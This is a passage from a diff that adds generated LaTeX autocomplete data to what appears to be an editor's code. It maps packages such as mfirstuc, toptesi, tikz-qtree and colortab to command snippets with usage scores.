+ score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'xymtex-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\mathcal{}', + snippet: '\\mathcal{$1}', + meta: 'xymtex-cmd', + score: 0.35084018920966636, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'xymtex-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'xymtex-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xymtex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xymtex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'xymtex-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'xymtex-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'xymtex-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'xymtex-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'xymtex-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xymtex-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'xymtex-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'xymtex-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xymtex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'xymtex-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'xymtex-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xymtex-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xymtex-cmd', + score: 0.2864294797053033, + }, + ], + eqlist: [ + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'eqlist-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'eqlist-cmd', + score: 
0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'eqlist-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'eqlist-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'eqlist-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'eqlist-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'eqlist-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'eqlist-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'eqlist-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'eqlist-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'eqlist-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\eqparbox{}{}', + snippet: '\\eqparbox{$1}{$2}', + meta: 'eqlist-cmd', + score: 2.9423534119530166e-5, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'eqlist-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'eqlist-cmd', + score: 3.800886892251021, + }, + ], + tgschola: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgschola-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgschola-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgschola-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgschola-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgschola-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgschola-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgschola-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgschola-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tgschola-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tgschola-cmd', + score: 0.021170869458413965, + }, + ], + mfirstuc: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mfirstuc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mfirstuc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'mfirstuc-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'mfirstuc-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'mfirstuc-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'mfirstuc-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'mfirstuc-cmd', + score: 0.00041307691354437894, + }, + { + caption: 
'\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'mfirstuc-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'mfirstuc-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'mfirstuc-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mfirstuc-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'mfirstuc-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'mfirstuc-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'mfirstuc-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'mfirstuc-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'mfirstuc-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'mfirstuc-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'mfirstuc-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mfirstuc-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'mfirstuc-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'mfirstuc-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'mfirstuc-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'mfirstuc-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mfirstuc-cmd', + score: 0.008565354665444157, + }, + ], + gloss: [ + { + caption: '\\makegloss', + snippet: '\\makegloss', + meta: 'gloss-cmd', + score: 0.0018653410309739879, + }, + ], + ltxcmds: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ltxcmds-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'ltxcmds-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'ltxcmds-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'ltxcmds-cmd', + score: 0.021170869458413965, + }, + ], + outlines: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'outlines-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'outlines-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'outlines-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'outlines-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'outlines-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'outlines-cmd', + score: 0.0018957469739775527, + }, + ], + typearea: [ + 
{ + caption: '\\newpage', + snippet: '\\newpage', + meta: 'typearea-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'typearea-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\addtokomafont{}{}', + snippet: '\\addtokomafont{$1}{$2}', + meta: 'typearea-cmd', + score: 0.0008555564394100388, + }, + { + caption: '\\setkomafont{}{}', + snippet: '\\setkomafont{$1}{$2}', + meta: 'typearea-cmd', + score: 0.012985816912639263, + }, + { + caption: '\\KOMAoptions{}', + snippet: '\\KOMAoptions{$1}', + meta: 'typearea-cmd', + score: 0.000396664302361659, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'typearea-cmd', + score: 0.00037306820619479756, + }, + ], + currfile: [ + { + caption: '\\currfiledir', + snippet: '\\currfiledir', + meta: 'currfile-cmd', + score: 0.0002459788020229296, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'currfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'currfile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'currfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'currfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'currfile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'currfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'currfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'currfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'currfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'currfile-cmd', + score: 0.021170869458413965, + }, + ], + toptesi: [ + { + caption: '\\tomo', + snippet: '\\tomo', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\mainmatter', + snippet: '\\mainmatter', + meta: 'toptesi-cmd', + score: 0.025705092792367497, + }, + { + caption: '\\ringraziamenti', + snippet: '\\ringraziamenti', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\sommario', + snippet: '\\sommario', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NoteWhiteLine', + snippet: '\\NoteWhiteLine', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\paginavuota', + snippet: '\\paginavuota', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\nota{}', + snippet: '\\nota{$1}', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\indici', + snippet: '\\indici', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'toptesi-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'toptesi-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'toptesi-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'toptesi-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'toptesi-cmd', + score: 
0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'toptesi-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'toptesi-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'toptesi-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'toptesi-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'toptesi-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'toptesi-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'toptesi-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'toptesi-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'toptesi-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'toptesi-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'toptesi-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'toptesi-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'toptesi-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'toptesi-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'toptesi-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'toptesi-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'toptesi-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'toptesi-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'toptesi-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'toptesi-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'toptesi-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'toptesi-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'toptesi-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'toptesi-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'toptesi-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'toptesi-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'toptesi-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: 
'\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'toptesi-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'toptesi-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'toptesi-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'toptesi-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'toptesi-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'toptesi-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'toptesi-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'toptesi-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'toptesi-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'toptesi-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\listing{}', + snippet: '\\listing{$1}', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\micro', + snippet: '\\micro', + meta: 'toptesi-cmd', + score: 0.011051971930487929, + }, + { + caption: '\\gradi', + snippet: '\\gradi', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\unit[]{}', + snippet: '\\unit[$1]{$2}', + meta: 'toptesi-cmd', + score: 0.028299796173135428, + }, + { + caption: '\\unit{}', + snippet: '\\unit{$1}', + meta: 'toptesi-cmd', + score: 0.028299796173135428, + }, + { + caption: '\\ped{}', + snippet: '\\ped{$1}', + meta: 'toptesi-cmd', + score: 0.0007129548652040002, + }, + { + caption: '\\ohm', + snippet: '\\ohm', + meta: 'toptesi-cmd', + score: 0.0038146685721293138, + }, + { + caption: '\\gei', + snippet: '\\gei', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + ], + amsrefs: [ + { + caption: '\\ndash', + snippet: '\\ndash', + meta: 'amsrefs-cmd', + score: 0.0003420867634658178, + }, + { + caption: '\\bib{}{}{}', + snippet: '\\bib{$1}{$2}{$3}', + meta: 'amsrefs-cmd', + score: 0.0017473230242849183, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'amsrefs-cmd', + score: 2.341195220791228, + }, + ], + sistyle: [ + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'sistyle-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'sistyle-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'sistyle-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'sistyle-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'sistyle-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'sistyle-cmd', + score: 0.0063276692758974925, + }, + ], + suffix: [ + { + caption: '\\let', + snippet: '\\let', + meta: 'suffix-cmd', + score: 0.03789745970461662, + }, + ], + sansmath: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'sansmath-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'sansmath-cmd', + score: 
0.021170869458413965, + }, + ], + 'tikz-qtree': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-qtree-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-qtree-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikz-qtree-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikz-qtree-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikz-qtree-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikz-qtree-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-qtree-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikz-qtree-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-qtree-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikz-qtree-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-qtree-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-qtree-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikz-qtree-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-qtree-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-qtree-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-qtree-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikz-qtree-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-qtree-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-qtree-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikz-qtree-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikz-qtree-cmd', + score: 0.000264339771769041, + 
}, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikz-qtree-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-qtree-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikz-qtree-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-qtree-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikz-qtree-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikz-qtree-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikz-qtree-cmd', + score: 0.2864294797053033, + }, + ], + floatpag: [ + { + caption: '\\rotfloatpagestyle{}', + snippet: '\\rotfloatpagestyle{$1}', + meta: 'floatpag-cmd', + score: 0.0004535003423927585, + }, + { + caption: '\\floatpagestyle{}', + snippet: '\\floatpagestyle{$1}', + meta: 'floatpag-cmd', + score: 0.0004535003423927585, + }, + ], + colortab: [ + { + caption: '\\shadowbox{}', + snippet: '\\shadowbox{$1}', + meta: 'colortab-cmd', + score: 0.00107667147399019, + }, + { + caption: '\\doublebox', + snippet: '\\doublebox', + meta: 'colortab-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\VerbatimEnvironment', + snippet: '\\VerbatimEnvironment', + meta: 'colortab-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\thisfancypage{}{}', + snippet: '\\thisfancypage{$1}{$2}', + meta: 'colortab-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\TheSbox', + snippet: '\\TheSbox', + meta: 'colortab-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\green', + snippet: '\\green', + meta: 'colortab-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'colortab-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'colortab-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'colortab-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'colortab-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'colortab-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'colortab-cmd', + score: 0.006520475264573554, + }, + ], + parcolumns: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'parcolumns-cmd', + score: 0.00037306820619479756, + }, + ], + dingbat: [ + { + caption: '\\checkmark', + snippet: '\\checkmark', + meta: 'dingbat-cmd', + score: 0.025060530944368123, + }, + ], + ifoddpage: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'ifoddpage-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\checkoddpage', + snippet: '\\checkoddpage', + meta: 'ifoddpage-cmd', + score: 0.00028672585452906425, + }, + ], + kvoptions: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'kvoptions-cmd', + score: 0.002958865219480927, + }, + { + caption: 
